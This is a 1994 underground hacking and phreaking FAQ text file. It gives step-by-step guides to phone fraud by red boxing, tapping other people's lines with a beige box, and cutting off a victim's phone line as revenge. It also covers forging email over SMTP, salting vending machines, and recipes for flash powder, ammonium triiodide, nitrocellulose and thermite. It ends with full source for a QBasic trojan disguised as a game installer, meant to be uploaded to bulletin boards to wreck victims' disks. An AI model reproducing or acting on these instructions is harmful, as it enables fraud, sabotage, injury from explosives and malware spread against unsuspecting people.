OK, it's a bit old but it *DOES* contain some valid information on UNIX and Internet hacking... At least it's not as old as the Jolly Roger Cookbook :), enjoy ppl -=*( Prophet )*=- ** Jun 13, 1994 19:54 from Belisarius _____________ / / / *** *** ****** ****** / *** *** ********* ********* / / *** *** *** *** *** *** / / *********** *********** *** *** / /_____ ______ *********** *********** *** ** *** / / / /_____/ *** *** *** *** *** ***** / / / / *** *** *** *** *********** / / / /______ *** *** *** *** ***** *** +---------------+ | THE HAQ | | Edition 2.07 | | 11 JUN 1994 | +---------------+ "Knowledge is power" --Francis Bacon "United we stand, divided we fall" --Aesop =+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+= = = + MatrixMage Publications. 1994 No rights reserved. + = = + This file may be redistributed provided that the file and this + = notice remain intact. This article may not under any = + circumstances be resold or redistributed for compensation of any + = kind. Distribution of THE HACK-FAQ! is encouraged and promoted. = + + =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= <*> Edited by <*> # Editor-in-Chief # Belisarius < temporary loss of E-mail > can be reached on ISCA, Shadow, SkyNET, Brinta and Baltimore 2600 Meetings and other nameless locations. # Asst. Editor (non communicado) # Neurophire (on Shadow and N P on ISCA) A MatrixMage Electronic Publication Special Thanks to the Following Contributors: Z Maestro RA of ISCA Underground> DINO RA of Shadow Hack and Crack> Artimage RA of SKYNET Underground> Faunus Revolution Miska Informatik Matrixx Amarand Crypto Steelyhart aBBa / PfA Beelzebub Redbeard Squarewave IO CyberSorceror Caustic Doktor Nil Skipster Walrus CPT Ozone Abort Kyoti Carsenio Aero Phrack AND NOW A WORD FROM YOUR EDITOR: Throughout history mankind has been afraid of the unknown. Before lightning could be scientifically explained it was blamed on the anger of the gods. This belief in mysticism persisted throughout the ages (and still does today). Later as man acquired simple herbal and chemical knowledge, these men were revered as mages, users of mystical arts derived from the old gods. But as organized religion (i.e. Christianity especially Roman Catholicism) spread and came to dominate society (became the powers that be), the mage was no longer revered. The mage (who only sought to understand the world around himself and make the world a better place) was persecuted, attacked and driven underground by the church. But driving these mages underground (out of society) did not stop there ideas from spreading or them from continuing to work. The church label Copernicus as a heretic and mage and only this century has the Roman Catholic church accepted his principles (heliocentric universe) as fact. So are 'hackers' the same today. We surf the nets seeking knowledge and information (and hopefully understanding). Information and understanding the meaning and import of the information are the two greatest commodities and bases of power in the world today. These things are easy to disseminate and gather in the electronic world. The matrix (cyberspace/web/net [whichever term you choose] is able to influence and control information faster and better than ever before. This makes many afraid of the cyberculture (not to mention a deep-seated techno-fear of many people, anything new and technical is bad). We are a new breed of mage; seeking knowledge, desiring understanding, persecuted by the powers that be. This is why I have started this publication. We are the MatrixMages! Our mission is to learn and to pass on that knowledge. -=> Belisarius <=- ********************************************************************* What is 'Cyberpunk' and the Underground? "Every time I release a phile, or write an article for a zine, it's vaguely like a baby. It gets stored, and copied, and sent out all over the world, and people read it. It goes into their minds. Something I created is buried in living tissue and consciousness someplace. Eventually somebody uses it, and I know that I have the power to change the world. Somewhere, someplace, somebody changed something using information I changed or created. I helped to change the world." --Unknown That is the attitude of many of the people who, knowingly or not, are members of this hyped/wired/cyber culture. Some who may read this will see some of their undefined beliefs, hopes and feelings reflected in the above quote. And, as the quote says, they will help spread it. Somewhere, somehow, that quote will change the world. But only if you work to change it. Remember that information and knowledge a powerful commodities. He who has information cannot be beaten. So above all the most important thing to do in the "Underground" is to gather information. This means that you have to work and put in some effort. You don't get something' for nothing! So work hard and together we can change the world! Keep up with latest editions. (Sorry there haven't been many lately but exams and not failing out took precedence!) The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor are not responsible for any consequences. You use this information at your own risk. ********************************************************************* CONTENTS ********************************************************************* Sections I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) II. Fake E-Mail (Fooling UUCP) III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding) IV. The Big Bang (Making Weapons and Explosives) V. Infection (Virii, Trojans, Worms and other creepy crawlies) VI. NEWBIES READ THIS (Basic Hacking) VII. Screwing with the most widespread operating system on the net (UNIX / AIX Hacking) VIII. Screwing with the most secure operating system on the net (VAX/VMS Hacking) IX. Screwing with the most widespread operating system on PCs (MS-DOS Hacks) X. Finding out what that encrypted info is (Cracking programs) XI. How do I keep my info secure (PGP / Cryptology) XII. Chemistry 101 (explosive/pyrotechnic component prep) XIII. Fun things with solder, wires, and parts (Underground electronics) XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) XV. Tuning in to what's on the radio waves (Radios and Scanning) Appendices A. FTP sites with useful info B. Interesting Gophers C. Informative USENET Newsgroups D. Publications and Zines E. Books F. Files and Papers G. Cataglogs H. PGP Keys ********************************************************************* ===================================================================== I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) WHAT IS A RED BOX AND HOW DO I MAKE ONE? (from Doktor Nil) First note: a redbox is merely a device which plays the tone a payphone makes when you insert money. You just play it through the mike on the handset. You would think that the Phone Co. would mute the handset until you put a quarter in, and perhaps they are starting to build phones like that, but I have yet to see one. What you need: - Radio Shack 33 memory Pocket Tone Dialer - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address below) - A solder gun. - Someone who can point out the crystal in the Tone Dialer. Instructions: 1) Open up the back of the tone dialer. Use screwdriver. 2) Locate crystal. It should be toward the right side. It will be smaller than the 6.5 MHz one you bought, but otherwise vaguely similar. It is basically capsule-shaped, with two electrodes coming out of the bottom which are soldered onto a circuit board. It's on the _left_ side, basically the third large crystal thing from the bottom, about 1.5 cm long, metallic, thin. 3) De-solder, and de-attach, crystal. Heat the solder that the crystal is seated in; remove crystal. 4) Attach 6.5 MHz crystal. It is easiest just to use the solder which is already there from the old crystal, that way there is less chance of you dropping hot solder somewhere it shouldn't be and losing everything. Heat first one drop of solder with the solder gun, and seat one electrode of the 6.4 MHz crystal in it, then do the same with the other. This is the easiest part to mess up, be careful that both drops of solder don't run together. 5) Put cover back on. you are done. How to use: Five presses of the "*" key will make the quarter sound. I think fewer presses make nickel/dime sounds, but I can't remember specifically. Here in Michigan, you can simply hold it up to the handset and press memory recall button 1 (where you have conveniently recorded five *'s -read the tone dialer directions on how to do this) and get a quarter credit, _IF_ you are calling LD. Keep making the tone to get additional credits. There is a maximum number of credits you can have at once. To make a local call this may not work. You need to first put in a real coin, then you can use the redbox for additional credits. There may be a way around this, however: Call the operator, and ask her to dial your number for you. She should do this without asking why, it is a regular service. If you need an excuse, say the "4" key isn't working, or something. She will ask you to insert your money. At this point use the redbox. If all goes well, she dials your number and you're in business. If she says "Will you do that one more time," or "Who is this," or any variations, hang up and walk away. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO THESE CRYSTALS LOOK LIKE? In most cases, a rectangular metal can with two bare wires coming out of one end, and a number like "6.50000" stamped on one side. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL? (from Matrixx) 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536 is the easiest to find (Radio Shack) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX? The crystals are available from Digi-Key. Call 1-800-DIGIKEY (1-800-344-4539) for more info. The part order number from DIGI-KEY is x-415-ND ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX? (from DINO) For a Radio Shack conversion red box: a nickel is one * and a quarter is 5 *'s Here are the freqs for a red box: $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse with 33 millisecond pause between each pulse $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66 millisecond pauses $.05 one pulse at the above freqs for 66 milliseconds! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO YOU KNOW THAT THE PHONE IS A COCOT? (from Faunus, Carsenio) If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT is a general term for Customer owned or "Bell-independent" phone companies. Sometimes they are more shabbily constructed than real fortress phones but others look about the same except for a lack of phone company logo. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FOOLING COCOTS USING 800 NUMBERS? You call up an 800 number as any public phone HAS too let you dial 800 numbers for free. Then you let the person who answers the 800 number hang up on you, THEN you dial your number that you want to call free. OK MOST COCOTs disable the keypad on the phone so you CANT just dial the number, you have to use a pocket tone dialer to dial the number. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE A BEIGE BOX? (from Neurophyre) Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator clips, ratchet wrench, 7/16-inch hex head 1. Cut the head off one end of the phone cord. 2. Strip the coating back about two (2) inches. 3. Look for the red wire, and the green wire. 4. Mark one clip green and put it on the green. 5. Mark the other red and put it on the red. 6. Once you have them soldered and insulated, plug the other end (that still has the head) into a phone. 7. Go out in the daytime and look for green bases, green rectangular things sticking about 3 feet out of the ground with a Bell logo on the front. If you're a lamer, you'll waste your time with a cable company box or something. I've heard of it. 8. Come back to a secluded one at night. With the wrench, open it up. 9. Find a set of terminals (look like the threaded end of bolts in my area) with what should be a red wire and a green wire coming off them. 10. Plug in your beige box red to red and green to green, pick up the phone and dial away! Modems work too as well as taps and shit. You're using someone else's line (unless you're an idiot) to get phone service. Don't abuse the same line after the phone bill comes. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ BEIGE BOXING 101 Field Phreaking by Revolution At the beginning of the section in the Bell training manual entitled "One million ways to catch and fry a phreak" it doesn't have a disclaimer saying "for informational purposes only". So why the hell should I put one here? Give this file to whoever you want, just make sure it all stays together, same title, same byline. Field phreaking gives you everything you've ever wanted: free long distance calls, free teleconferencing, hi-tech revenge, anything you can do from your own phone line and more, without paying for it, or being afraid of being traced. Just be ready to bail if you see sirens. How to make a beige box: Easiest box to make. Cut your phone cord before the jack, strip the wires a little. You should see a red (ring) wire and a green (tip) wire. If you see yellow and black wires too just ignore them. Put one set of alligator clips on the red wire and one on the green wire, and you're set. (You want to use your laptop computer, but you don't want to ruin your modem's phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on the back, and do the same thing as above. Now you can use a phone, laptop, anything you can plug in a jack.) How to use: What you have is a lineman's handset. You can use it from any bell switching apparatus (from now on sw. ap.). These are on phone poles, where your phone line meets your house, and near payphones. I'll go into detail below, but basically just open any box on a telephone pole, and you'll see sets of terminals (screws), with wires wrapped around them, just like on the back of a phone jack. These screws are where you need to attach your alligator clips to get a dial tone. Don't unscrew the screw, you'll just fuck up some poor guys line, and increase your chances of getting caught. After the wire goes around the screw, it normally twists off into the air. Put your clip on the end of the wire. Do the same with the other clip. If you don't get a dial tone, then switch terminals. On telephone poles: TTI terminals: These must have been built by phreaks, just for beige boxing. By far the easiest sw. ap. use. The only drawback is that they only connect to one phone line. These are the fist sized gray or black boxes that appear where a single phone line meets the mother line. They look almost like outdoor electric sockets, that have the snap up covering. They normally have the letters TTI somewhere on the front. No bolts or screws to take off, just snap up the top and you will see four screws. Clip in and happy phreaking. Just click the top down and no one will ever know you were there (except for the extra digits on their phone bill.) Green trees: just about the hardest sw. ap. to beige from (tied with the bell canister) but if its the only one you can use, go for it. These are the 3 foot high green/gray metal columns that are no wider than a telephone pole (which makes them different then the green bases, see below), that say "Call before digging, underground cable," or the real old ones just have a bell sign. Usually green trees are right at the base of phone poles, or within a foot or two of them. These normally have two 7/16 bolts on one side of the column, which have to be turned 1/8 a turn counterclockwise, and the front of the base will slide off. Now you will see a sheet of metal with a few square holes in it, that has a bolt where the doorknob on a door would be. Ratchet this one off and the metal sheet will swing open like a door. On one side of the sheet will be a paper with a list of #'s this tree connects to. Inside you'll see a mass of wires flowing from gray stalks of plastic in sets of two. The whole mass will have a black garbage bag around it, or some type of covering, but that shouldn't get in the way. The wires come off the gray stalk, and then attach to the screws that you can beige from, somewhere near the ground at the center of the tree. These are on a little metal column, and sometimes are in a zig-zag pattern, so its hard to find the terminals that match in the right order to give you a dial tone. Green bases: The gray/green boxes you see that look just like green trees, except they are about twice or three times as wide. They open the same as trees, except there are always 4 bolts, and when the half slides off, inside is a big metal canister held together with like 20 bolts. I wouldn't open it, but with a little info from friends and some social engineering, I learned that inside is where two underground phone lines are spliced together. Also inside is either pressurized gas or gel. Pretty messy. Bell canisters: attached to phone poles at waist level. They are green (or really rusted brown) canisters about a two feet tall that have a bell insignia on the side. They will have one or two bolts at the very bottom of the canister, right above the base plate. Take the bolts off and twist the canister, and it'll slide right off. Inside is just like a green tree, except there normally isn't the list of #'s it connects to. Mother load: Largest sw. ap. A large gray green box, like 6 x 4, attached to a telephone pole about three feet off the ground. a big (foot or two diameter) cable should be coming out the top. Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a cabinet with double doors. Fasteners are located in the center of the box and on the upper edge in the center. Both of these are held on with a 7/16 bolt. Take the bolts off, and swing the doors open. On the inside of the right door are instructions to connect a line, and on the inside of the left door are a list of #'s the box connects to. And in the box are the terminals. Normally 1,000 phones (yyy-sxxx, where yyy is your exchange and s is the first number of the suffix, and xxx are the 999 phones the box connects too). On houses: follow the phone line to someone's house, and then down there wall. Either it goes right into there house (then you're screwed) or it ends in a plastic box. The newer boxes have a screw in the middle, which you can take off with your fingers, and then put the box back on when you're done, but the older ones are just plastic boxes you have to rip off. Inside are 4 terminals, yellow, black, and red and green, the two you need. Find the Christmas colors, and phreak out. On payphones: follow the phone line up from the phone, and sometimes you'll find a little black box with two screws in it. Undo this, and you'll find a nice little phone jack. You don't even need your beige box for that one. If there's not one of those, follow the wire to a wall it goes into, and sometimes there will be a sw. ap. like those on houses (see above). Payphones are normally pretty secure now though, and you probably won't find any of those. Phreaky things you can do: Jesus, do I have to tell you lamers everything? Anyway, free long distance calls should be pretty easy, and get teleconferencing info from somebody else, just make sure you ANI the # you're calling from before calling Alliance. Hi-tech revenge! Possibilities are endless, you have total control of this lamers line. Most of you guys are probably way to elite for this one, but you can disconnect his line by loosening a few screws and ripping his wires at any sw. ap. but here's something a lot better: Get the faggots number, and then find the mother load sw. ap. it connects to (not the sw. ap. on his house or on the telephone pole in his drive way, the _mother_load_) Find his # in the terminals, and then connect the two terminals with a paper clip or an alligator clip! His phone will be busy until ma bell figures out what the hell is going on, and since the last place they look is the mother load, this usually is at least a week. Then, of course, is the funniest prank: Beige box from a major store, like Toys R Us (that's my favorite) and call up ma bell "Yeah, I'd like all calls to this number forwarded to (his #)" That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow, phunk on IRC, or Revolution on Delphi. Any phreaks out there who got new info, war stories or some addictive disorder and just need somebody to talk to, E-mail revolution@delphi.com no PGP needed. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT PHONE NUMBER AM I CALLING FROM? (from Skipster, et al) This service is called ANI. This number may not work, but try it anyway: (800) 825-6060 You might want to try is dialing 311 ... a recorded message tells you your phone #. Experiment, but 311 does work, if it doesn't and an operator picks up, tell her that you were dialing information and your hand must have slipped. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I USE/DO ALLIANCE TELECONFERENCING? (from Neurophire, Carsenio) Set one of these up, it is a 1-800 dial-in conference. Then, grab your beige box, go to some business, preferably something like a Wal-Mart or a Radio Shack and beige box off their line. Then call and set up a teleconference for whenever to be billed to the line you are calling from. You'll want to know specifically what to ask for. Alliance teleconferencing is 0-700-456-1000. Dial the number (you're of course paying for this by the minute) and you get automated instructions on how to choose the number of ports for your conference call, and how to dial each participant.. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK? (from Token) Just scroll through your favorite business magazine and look for 800#s. Once you get a VMB system you can look for a box being used and try the default passcodes <0000> , <9999> , etc. Like on the INet, most people are too dumb to change their passwd. If you're lucky you might get the root box (I did, the stupid ass's passwd was <4321>). ===================================================================== II. Fake E-mail (Fooling UUCP) HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)? (from Beelzebub, Doktor Nil w/ Belisarius) 1. Telnet to port 25 of any internet server (eg. telnet site.name.and.address 25) 2. If at all possible, AVOID TYPING "HELO". 3. Type: rcpt to (person to receive fake mail){ENTER} 4. Type: mail from (fake name and address){ENTER} 5. The mail server should ok each time after each name. 6. If it does not: a) type vrfy and then the name of the person b) as a last resort use helo, this will login your computer as having been the source of the mail 7. Retype the commands, it should say ok now. 8. Type: data{ENTER} 9. The first line of the message will be the Subject line 10. Enter your letter 11. To send letter type a "." on an empty line. 12. Then type quit{ENTER} 13. This is traceable by any sysadmin ... don't harass people this way. 14. If the person receiving the mail uses a shell like elm he/she will not see the telltale fake message warning "Apparently-To:(name)" even if not, most people wouldn't know what it means anyway. 15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4 so as to make it look more believable and cover any add-ons the mail routine might try 16. Put a realistic mail header in the mail message to throw people off even more. If there are To: and Date: lines then the program probably won't add them on. 17. Also try to telnet to the site where the recipient has his account. This works better if you know how to fool it. ===================================================================== III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding) WHAT DOES SALTING VENDING MACHINES DO? When you take concentrated salt water (a high concentration of salt) and squirt it into the change slot (preferably where the dollar bills come in, though some say it doesn't matter), the salt will short circuit the machine and out will pour change and hopefully sodas. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ANOTHER WAY OF GETTING FREE SODAS? This is an easier and actually more reliable way of getting free sodas. It only wprks pn spme machines though, usually Coca-Cola. Anyways, put in your change and as the last coin goes down the slot start rapidly and repeatedly pressing the button of your choice. If everything works well, then you should get two sodas and your change back. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW ARE THE TRACKS OF ATM CARD ARRANGED? The physical layout of the cards are standard. The logical arrangement of the data stored on the magnetic strip varies from institution to institution. There are some generally followed layouts, but not mandatory. There are actually up to three tracks on a card. Track 1: Designed for airline use. Contains name and possibly your account number. This is the track that is used when the ATM greets you by name. There is alot of variation in how things are ordered so occasionally you get 'Greetings Q. John Smith' or 'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'. This track is also used with the new airline auto check in (PSA, American, etc). Track 2: The main operational track for online use. The first thing on the track is the Primary Account Number (PAN). This is usually pretty standard for all cards. Some additional info might be on the card such as expiration date. One interesting item is the PIN (Personal Identification Number) offset. When an ATM verifies a PIN locally, it usually uses an encryption scheme involving the PAN and a secret KEY. This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got generated). If you want to select your own PIN, they would put the PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on the Natural PIN plus the offset, and you have the selected PIN. The PIN is never in the clear on your card. Knowing the PIN OFFSET will not give you the PIN. This will require the SECRET KEY. Track 3: The "OFF-LINE" ATM track. It contains information such as your daily limit, limit left, last access, account number, and expiration date. The ATM itself could have the ability to write to this track to update information. ===================================================================== IV. The Big Bang (Making Weapons and Explosives) FLASH POWDERS: (from Neurophyre) Materials: Powdered magnesium, powdered potassium nitrate 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium nitrate. 2. Light it with a long fuse cuz its so bright it might screw up your eyes. REAL Cherry Bomb Powder 4 parts by weight of potassium perchlorate 1 part by weight of antimony trisulfide 1 part by weight aluminum powder Relatively Safe 3 parts by weight of potassium permanganate 2 parts by weight of aluminum powder *VERY* Shock/Friction/Static/Heat Sensitive! Use only if suicidal or desperate! 4 parts by weight of potassium chlorate 1 part by weight of sulfur 1 part by weight of aluminum powder 1) To use these mixtures, SEPARATELY pulverize each ingredient into a fine powder, the finer it is, the more power you get. Use a mortar and pestle if available, and grind GENTLY. Do not use plastic as this can build a static charge. Remember, do them SEPARATELY. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ AMATEUR EXPLOSIVE (Ammonium Triiodide): (from IO) WARNING: This explosive is EXTREMELY shock sensitive when dry, and moderately sensitive when wet!!! AVOID IT when dry! DO NOT store! The purplish iodine vapor this produces during the explosion will stain and corrode! 1) Take a small plastic bucket, add 3-4 inches of household ammonia. This bucket will never be clean again, in all likelihood. Try to get clear (non-pine, non-cloudy) ammonia. Or use an ammonium hydroxide solution from a chemlab. This results in better but more sensitive, and therefore dangerous crystals. 2) Drop in iodine (like you use on scratches) one drop at a time, or, preferably, use crystals of iodine. 3) Let it settle, then pour it through a piece of cloth, discarding the runoff. 4) Squeeze *gently* to get out excess liquid. 5) Mold it onto the thing you want to blow up, stand **way** back. 6) Wait for it to dry, and throw a rock at it. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW TO BUILD A TENNIS BALL CANNON? 1. Get six (6) tin cans. 2. From five of them remove the tops and bottoms. 3. From the last one remove only the top. (this is the last can to make the breach) 4. The cans should overlap and be fit together to make a long barrel closed at one end and open at the other. ___________________________________ open --> ()____)_____)_____)_____)_____)_____) <--closed (barrel) 1 2 3 4 5 6 (breach) 5. Duct tape all of the cans together. USE LOTS OF TAPE!! 6. Put some gunpowder in the bottom of the CANnon. 7. Aim, brace the CANnon. 8. Spray hairspray or pour alcohol on the tennis ball and light. 9. Drop the ball into the can and STAND BACK! Other ideas: a) Make explosive tennis balls. b) Launch potatoes. c) Launch thumbtacks, nails, broken glass, etc. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)? (from Terrorist's Handbook) Materials: cotton, concentrated nitric acid, concentrated sulfuric acid, distilled water Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue litmus paper Procedure: 1. Pour 10mL of sulfuric acid into beaker. 2. Pour 10mL of nitric acid into beaker with sulfuric acid. 3. Immediately add 0.5 gram of cotton. 4. Allow it to soak for EXACTLY three(3) minutes. 5. Remove the nitrocellulose. 6. Put the nitrocellulose into a beaker of distilled water to wash it in. 7. Allow the material to dry. 8. Re-wash it. 9. Once neutral(acid/base) it can be dried and stored. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THERMITE AND HOW DO I MAKE IT? Thermite is a powder which burns incredibly hot (approx. 2200 deg C) and can be used to burn through most anything. Materials: powdered aluminum, powdered iron oxide Procedure: mix the two powders together as evenly as possible Ignition: thermite is difficult to ignite but these work a) mix a small amount of potassium chlorate into the thermite mixture and ignite with a few drops of sulfuric acid b) magnesium strip or 'sparkler' stuck into the powder which is then lit as a fuse ===================================================================== V. Infection (Virii, Trojans, Worms and other creepy crawlies) WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. [number not available - :( ] Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to wiretap.spies.com and dig around in their online library under technical info. There are alot of places in the US to get virii too: The Hell Pit in Chicago has over 1500, and they don't accept the lame stuff like the ones written in basic, so they're all good ones. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ INTS USED: (from Belisarius) You want Int 18h, AH=03h, Al==Num sectors to write BX==offset of pointer to buffer CH=cylinder Number Cl=sector number DX=head number Dl=drive numbers ES=segment of pointer with buffer for CH=it's the low 8 bits of 10 bit cylinder number, for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits), 0-5=sector number. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: AH=status, AL=number of sectors written flags, carry set if an error. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SAMPLE OF A TROJAN (from Spear) This is a little trojan I wrote in Qbasic 4.5 It's a bitch! REM bitch by Spear color 14,0 print"installing datafiles... Please wait..." print"This may take up to 20 minutes, depending on your computer..." shell "cd\" for a = 1 to 100000 a$=str$(a) c$="md" + a$ + ".hee" shell c$ next a cls print"Cybermattixx Version 1.0 is now installed on your system..." print"Have a shitty day!" print " ?AM?" print input "Hit ENTER To REBOOT your System now!";a$ shell "boot.com" How to use it? This can pose as the installation program for a game. This means that when you upload it to a BBS or something, and post that it is a kickass game, people will download it and try to install it on their computers! What does it do? This program changes directory to the root and makes 100000 dirs in the root. You cannot use deltree to wipe them out in one chunk and you CANNOT get rid of them without doing reverse engineering on the program, ie. rd instead of md. To get rid of them any other way you would have to format c: or d: -=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--= -=*( Prophet )*=- ____ __ __ / __ \_________ ____ / /_ ___ / /_ The Truth Is Out There... / /_/ / ___/ __ \/ __ \/ __ \/ _ \/ __/ / ____/ / / /_/ / /_/ / / / / __/ /_ Trust No-One... /_/ /_/ \____/ .___/_/ /_/\___/\__/ /_/ Do Not Fear The Reaper, prophet@illumini.demon.co.uk Fear Your God-Damn Government